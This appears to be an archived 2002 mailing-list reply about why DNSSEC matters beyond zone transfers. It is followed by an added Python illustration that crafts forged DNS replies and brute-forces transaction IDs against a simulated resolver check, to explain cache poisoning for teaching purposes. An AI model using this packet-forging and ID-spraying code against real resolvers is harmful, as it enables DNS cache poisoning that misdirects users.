On Wed, Nov 20, 2002 at 10:14:50AM -0700, Vincent Danen wrote:

> From where I sit, the only thing djbdns doesn't do is DNSSEC and DDNS,
> neither of which are useful to me. DNSSEC can be avoided by using
> tcprules to protect access to zone transfers.
Vincent, I am sure you are aware of this, but for the benefit of those following along, DNSSEC is about _a_lot_ more than just securing who can zone transfer from you. It is the infrastructure needed to make DNS a PKI. It also adds integrity to a system that lacks any right now.

UDP packets are trivial to forge (much more trivially than TCP packets), so it is relatively easy to cause all kinds of security problems by means of forging DNS replies. People rely on the accuracy of DNS replies all the time (much more than they should). DNSSEC adds authenticity to DNS replies so that answers can be relied on to the extent that people (blindly) rely on them today.

On the PKI front, have you seen FreeSWAN's Opportunistic Encryption proposal? It uses the DNS to distribute and authenticate encryption and authorization keys. This can only be done with any reliability with DNSSEC.

b.

-- 
Brian J. Murrell
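An added illustration of the forging point made in the message above (this is example code written for this archive page, not something Brian or Vincent posted, and not part of djbdns or any other resolver): a minimal DNS wire-format encoder/decoder plus the acceptance check a pre-DNSSEC resolver can actually perform on a reply. All the resolver has to go on is that the 16-bit transaction ID, the question section and the QR bit match an outstanding query; nothing in the packet proves who sent it, so an attacker who can guess the ID (and, for resolvers that used a fixed source port, only the ID) gets a forged A record accepted. The hostname, the 0x1234 transaction ID and the 10.0.0.1 poison address are constructed sample values.

```python
import struct


def encode_name(name):
    """Encode a dotted hostname into DNS label format."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_query(txid, qname, qtype=1):
    """Standard recursive query: header (RD=1, QDCOUNT=1) + one question."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(qname) + struct.pack("!HH", qtype, 1)


def build_forged_answer(txid, qname, ip, ttl=3600):
    """A reply an attacker can craft with no secret: QR=1, RD/RA set, one A record.
    The owner name uses a compression pointer (0xC00C) back to the question name."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = encode_name(qname) + struct.pack("!HH", 1, 1)
    rdata = bytes(int(o) for o in ip.split("."))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + rdata
    return header + question + answer


def parse_name(msg, off):
    """Decode a (possibly compressed) name; return (name, offset after the name)."""
    labels, end = [], None
    while True:
        ln = msg[off]
        if ln & 0xC0 == 0xC0:  # compression pointer
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            if end is None:
                end = off + 2
            off = ptr
            continue
        off += 1
        if ln == 0:
            break
        labels.append(msg[off:off + ln].decode("ascii"))
        off += ln
    return ".".join(labels) + ".", (end if end is not None else off)


def parse_response(msg):
    """Parse header, question and A records out of a reply."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    qname, off = parse_name(msg, off)
    qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
    off += 4
    answers = []
    for _ in range(an):
        name, off = parse_name(msg, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:
            answers.append((name, ".".join(str(b) for b in rdata), ttl))
    return {"txid": txid, "flags": flags, "qname": qname, "qtype": qtype, "answers": answers}


def classic_resolver_accepts(outstanding, response):
    """Everything a resolver without DNSSEC can check: ID, question and QR bit.
    There is no origin authentication anywhere in a plain UDP reply."""
    r = parse_response(response)
    return (r["txid"] == outstanding["txid"]
            and r["qname"] == outstanding["qname"]
            and r["qtype"] == outstanding["qtype"]
            and (r["flags"] & 0x8000) != 0)


def spoof_by_brute_force(outstanding, qname, ip):
    """Attacker who knows the question (e.g. triggered the lookup) but not the ID:
    spray every possible 16-bit ID. Returns (guesses needed, accepted poison IP)."""
    for guess in range(0x10000):
        forged = build_forged_answer(guess, qname, ip)
        if classic_resolver_accepts(outstanding, forged):
            return guess + 1, parse_response(forged)["answers"][0][1]
    return None


if __name__ == "__main__":
    pending = {"txid": 0x1234, "qname": "www.example.com.", "qtype": 1}  # constructed
    build_query(pending["txid"], pending["qname"])
    print(spoof_by_brute_force(pending, "www.example.com.", "10.0.0.1"))
```

The brute-force loop is what the message means by "trivial to forge": with the question known, the only thing the attacker must match is a 16-bit number, and a flood of at most 65536 packets covers every value. Randomising the source port widens the search but does not change its nature; a DNSSEC signature over the RRset is what would make a guessed packet fail validation regardless of ID.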
